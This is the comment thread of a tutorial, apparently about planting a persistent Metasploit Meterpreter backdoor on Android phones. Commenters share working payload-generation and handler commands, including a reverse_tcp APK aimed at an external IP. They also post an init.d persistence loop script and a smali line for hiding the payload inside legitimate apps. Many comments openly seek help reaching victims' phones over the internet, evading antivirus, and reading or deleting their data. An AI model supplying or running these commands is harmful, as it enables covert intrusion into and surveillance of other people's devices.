Will I have to change ".MainActivity" if I changed the appname in <string name="appname">MainActivity</string> when decompiling the malicious apk according to this?

Keep up the wonderful work!

Thanks!

F.E.A.R i have a problem my meterpreter is not open i don't know why when i enter the command exploit it try to start but can't start u tell me what's the problem i try this from 1 week

This backdoor doesn't work for me at all ! I have uploaded the backdoor on victim's phone but it doesn't bring the session back once it has died.

Please Help !

Exploit Works !

You need to start exploit with this command:

ExitOnSession false
exploit -j

and Metasploit will keep session from dead.

guys i need a little help
i have embed payload.apk into original APK file, and is working well
but i want to use the script. how should i change the perimeters of the script?

this is only for rooted cellphones? I can't find the init.d folder, where i have to upload the .sh ?

Did you read the first part of the guide here?

I can't open the sdcard after the session opens. What should I do?

hi great tutorial,i was able to get meterpreter session over my local network but can't make it work over internet(WAN).Unfortunately i have a router (DIGISOL-HR1400) which has port triggeringinstead of port forwarding and i have heard that it is similar to port forwarding. I've tried a number of ways to set up port triggering but it just doesn't work. So any kind of help on how to set up port triggering is really appereciated!! :)

Why does it keep saying ...'while' unmatched ?

Hi F.E.A.R
thanks for this tuto ;)
for my phone the reversetcp exploit works but not the remaining of the tuto ... :(

It seems that you need a rooted device to get success right ?

I can't enter /etc/init.d or /system/etc/init.d (/etc is ok ...)

* Started reverse TCP handler on 192.168.0.16:443
* Starting the payload handler...
* Sending stage (63194 bytes) to 192.168.0.15
* Meterpreter session 9 opened (192.168.0.16:443 -> 192.168.0.15:36014) at 2016-11-13 09:42:42 -0500

meterpreter > pwd
/data/data/com.metasploit.stage/files
meterpreter > cd /
meterpreter > pwd
/
meterpreter > cd /etc/init.d

  • stdapifschdir: Operation failed: 1

then afteruploading my getroot.sh script, it doesn't execute properly :

sh getroot.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

Do you have any clue for me ?

I'm using a Samsung Galaxy Grand Prime (Android 5.1.1 / Kernel 3.14.27-1070395)

Any help would be appreciated ...

Best
FunkyDream

First this is a great tutorial.. but i need help when i exicuited this script i got error as Error: Bad component name: com.metasploit.stage/

what should i do pls hlp me

can anybody tell me how to modify the .sh file to match with embed payload in another original apk, how should i change the perimeters of the script?

yea, i also need a bit of help at this point.
any help would be apreciated.

Thank you for your great tutorial F.E.A.R but I'm having a problem running the script in shell...
I'm getting
Error type 3
Error: Activity class {com.metasploit. stage/com.metsaploit.stage.MainActivity} does not exist.
Here is a screenshot below

Any help will be appreciated.....
Thanks a lot
BTW...I'm using a rooted Samsung galaxy note 3 running android 5.0 stock rom

I've embedded it in hike apk. The error comes that the com.metasploit.stage.MainActivity doesnot exists. How to fix this?

Please Help me for Port forwarding i am in desparate need to exploit an android on other another network.

Please Somebody help me.

Anyone knows the list for all cmds available to execute on victims phone?
for e.g. delete media.

Hi F.E.A.R.,
thanks for the tutorial.
It's all working except for the last and crutial step:
after

sh anything.sh

I get the error message

Starting: Intent { act=android.intent.action.MAIN cat=android.intent.category.LAUNCHER pkg=–-user }

java.lang.SecurityException: Permission Denial: startActivity asks to run as user -2 but is calling from user 0; this requires android.permission.INTERACTACROSSUSERS_FULL

at android.os.Parcel.readException(Parcel.java:1686)
at android.os.Parcel.readException(Parcel.java:1639)
at android.app.ActivityManagerProxy.startActivityAsUser(ActivityManagerNative.java:3119)
at com.android.commands.am.Am.runStart(Am.java:635)
at com.android.commands.am.Am.onRun(Am.java:388)
at com.android.internal.os.BaseCommand.run(BaseCommand.java:51)
at com.android.commands.am.Am.main(Am.java:121)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:262)

Somebody facing the same problem?
Any tips?

Sartory

Found a solution:
On Android 6.0 you have to use the following script:

#!/bin/bash
# upload to etc/init.d/, so that it is persistent even afterReboot!
while :
do am startservice --user 0 com.metasploit.stage/.MainService
sleep 60
done

¯\(?)/¯ Sartory

Meterpreter session not receiving when I ran payload my IP address is dynamic so could it be reason for not receiving the payload,I used the following.

For payload
msfpayload android/meterpreter/reverse_tcp LHOST=MYEXTERNALIPHERE R > /root/abcde.apk
Then for Listener
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST MYPRIVATEIP
exploit

hi to all, i am just enrolled here.

i learned that is possible to make backdoor persistent by enable apk starting on phone boot / startup. there are plenty of material about.

2) to prevent antivirus to block installation i think we properly need to sign the apk
3) thanks

hey

i just wanted to say i did as you said but whenever i try to reconnect or say reboot it just don't connect and giver error and while on victims end it says unfortunately mainactivity stopped working any suggestions ?

if u are facing any problem follow this video tutorial.Thanks me later :)

Hi brother I've done all the steps and I run the script

But the problem is that the script works but when the application is closed the session closes and the script does not open again

root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=124.123.69.237 R > /root/Upgrader.apk

bash: msfpayload: command not found

PLS help me with this... I would be grateful

The screen needs to be turned on for this to work.

I had the handler listening for 2 minutes and nothing happened, but when I turned on the screen it instantly connected. And it keeps losing the connection, often it says "Session closed. Reason: died" within 2 minutes.

Anybody try to create script which you upload and execute?

why persistence not remain forever even android not reboot My IP static. Its working for a while 1 day or less and after persistence gone. Anybody know decision from this situation?

THX

hi,

I wanted to say you 'thank you so much' because I wanted to do this 2 ago days.But I could not. This is running! thank you so much :)

I have a question!?!?
Can I run a apk payload on an android device, then open msfconcle????

hey guys,

I have created this backdoor application and install in android mobile but this application is working on same network means when we both connected with same Wi-Fi router.

please give answer, it can only work in same network or it can work on different network..?

Hey F.E.A.R., u can elevate your privileges to admin by using getsystem module of metasploit framework.
.
.
.

Then u can put the backdoor in the init.d folder.done .
.
.
.
.
Hope it helps.

Persistance Shell code not working after app is hidden
Please help

But... What to do if the apk used was "backdoored"?? (I used Evil-Droid to do this.)

Hi, thx for your post. This script doesn't run when injecting payload on an existing apk, since this path is null. In fact you only add this line to the smali activity "invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V". Script tries to launch MainActivity and error says "Activity class does not exist..." ¿Any help? thx in advance

Hello F.E.A.R,
Im using it in wan and im getting the
Handler failed to bind to Started reverse TCP handler on 0.0.0.0:444

and its not opening sessions nothing please help me with this.

hey F.E.A.R I'm doing this on an Android pie 9.0 phone (rooted)and the init.d file is not there in it ....is there any other file ? or something wrong?

Will it work without sdcard? Is /sdcard directory available without sdcard?

Hi
I am getting a error after
sh anything.sh
: not found6: :
Like this
Can u help with it
Thank you

Hello,F.E.A.R? How long should it take for the listener to begin exploiting the device?
The last thing I can get is "started reverse TCP handler on 'myip':4444

Hi F.E.A.R,
At the time of execution of the script I'm getting this error:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

java.lang.SecurityException: Permission Denial: startActivity asks to run as user 2 but is calling from user 0; this requires android.permission.INTERACTACROSSUSERS_FULL

at android.os.Parcel.readException(Parcel.java:1718)
at android.os.Parcel.readException(Parcel.java:1671)
at android.app.ActivityManagerProxy.startActivityAsUser(ActivityManagerNative.java:3205)
at com.android.commands.am.Am.runStart(Am.java:643)
at com.android.commands.am.Am.onRun(Am.java:394)
at com.android.internal.os.BaseCommand.run(BaseCommand.java:51)
at com.android.commands.am.Am.main(Am.java:124)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:359)

Can someone help me to fix this.
I was running this in Android 7.0

By any chance did you get it fixed? I am facing the same issue on android 11

how to write the script command man send the screenshot please

I followed the exact steps in the tutorial.....the bash script gets executed properly but whenever u type exploit, a session doesn't pop up

I've set sleep to 20

Hello ,
when i am trying to exexute anything.sh file
using sh anything.sh
In device 1:
Error: while unmatched
In device 2:
Error : file inaccessible or not found
In device 3:
: notfound :

I am harshly structed here seeking help......
Can u help me F.E.A.R ?

I think that using these tools to generate a basic Payload is useless, AV will detect it immediately and the other thing is that we have very limited access to the phone. If there is a way to get access on phone's camera,files,location,messages etc without roon and on the newer versions of adnroid like android 9,10,11,12 etc then please tell me. Thanks.

Share Your Thoughts

  • Hot
  • Latest